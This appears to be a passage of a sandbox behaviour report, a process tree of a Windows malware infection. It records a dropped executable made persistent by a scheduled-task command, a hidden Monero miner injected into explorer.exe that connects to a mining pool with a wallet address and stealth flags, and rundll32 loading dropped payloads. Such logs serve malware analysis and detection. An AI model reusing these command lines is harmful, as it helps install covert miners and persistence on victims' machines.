C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3528
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:2284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3460
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:1980
-
-
-
-
-
-
-
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Process spawned unexpected child process
PID:2824 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global3⤵PID:3232
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:1820
-
C:\Users\Admin\AppData\Local\Temp\5327a7c7-1b5d-4684-b3bf-a78635542d3b\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5327a7c7-1b5d-4684-b3bf-a78635542d3b\AdvancedRun.exe" /SpecialRun 4101d8 31361⤵PID:3680
-
C:\Users\Admin\AppData\Local\Temp\696f1bfc-25a4-4463-80bb-9b549f1bd2b1\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\696f1bfc-25a4-4463-80bb-9b549f1bd2b1\AdvancedRun.exe" /SpecialRun 4101d8 36481⤵PID:3816
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G1⤵PID:2568
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G2⤵PID:2436
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G3⤵PID:964
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'1⤵
- Creates scheduled task(s)
PID:2308
-
C:\Windows\system32\taskeng.exetaskeng.exe {BB293204-450E-48EE-8E49-E599A9E942C8} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:3400
-
C:\Users\Admin\AppData\Roaming\urdrwdvC:\Users\Admin\AppData\Roaming\urdrwdv2⤵
- Loads dropped DLL
PID:1676
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {01CABCB0-D5D7-4FC9-988F-C5CA02B820C0} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:3908
-
C:\Users\Admin\AppData\Roaming\urdrwdvC:\Users\Admin\AppData\Roaming\urdrwdv2⤵PID:3444
-
-
C:\Users\Admin\AppData\Local\Temp\E58F.exeC:\Users\Admin\AppData\Local\Temp\E58F.exe1⤵PID:3732
-
C:\Windows\system32\taskeng.exetaskeng.exe {523E2C9B-A78A-4C3D-B602-9E03A4F9223A} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:3772
-
C:\Users\Admin\AppData\Roaming\urdrwdvC:\Users\Admin\AppData\Roaming\urdrwdv2⤵PID:1816
-